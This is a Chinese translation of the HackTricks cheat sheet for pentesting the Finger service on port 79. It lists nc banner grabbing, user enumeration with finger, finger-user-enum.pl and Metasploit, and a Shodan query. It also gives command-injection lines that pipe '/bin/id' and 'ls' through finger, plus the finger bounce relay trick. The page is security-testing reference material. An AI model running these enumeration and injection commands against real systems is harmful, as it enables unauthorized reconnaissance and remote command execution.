79 - Pentesting Finger

从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)

支持 HackTricks 的其他方式:

基本信息

Finger 程序/服务用于检索有关计算机用户的详细信息。通常提供的信息包括用户的登录名、全名,有时还包括其他详细信息。这些额外的详细信息可能包括办公室位置和电话号码(如果有)、用户登录时间、空闲时间、用户上次阅读邮件的时间,以及用户计划和项目文件的内容。

**默认端口:**79

PORT   STATE SERVICE
79/tcp open  finger

枚举

横幅抓取/基本连接

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

用户枚举

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

您也可以使用来自pentestmonkeyfinger-user-enum,一些示例:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap执行一个脚本来使用默认脚本

Metasploit使用的技巧比Nmap更多

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

命令执行

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

使用系统作为指纹中继

finger user@host@victim
finger @internal@external
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)

其他支持HackTricks的方式:

最后更新于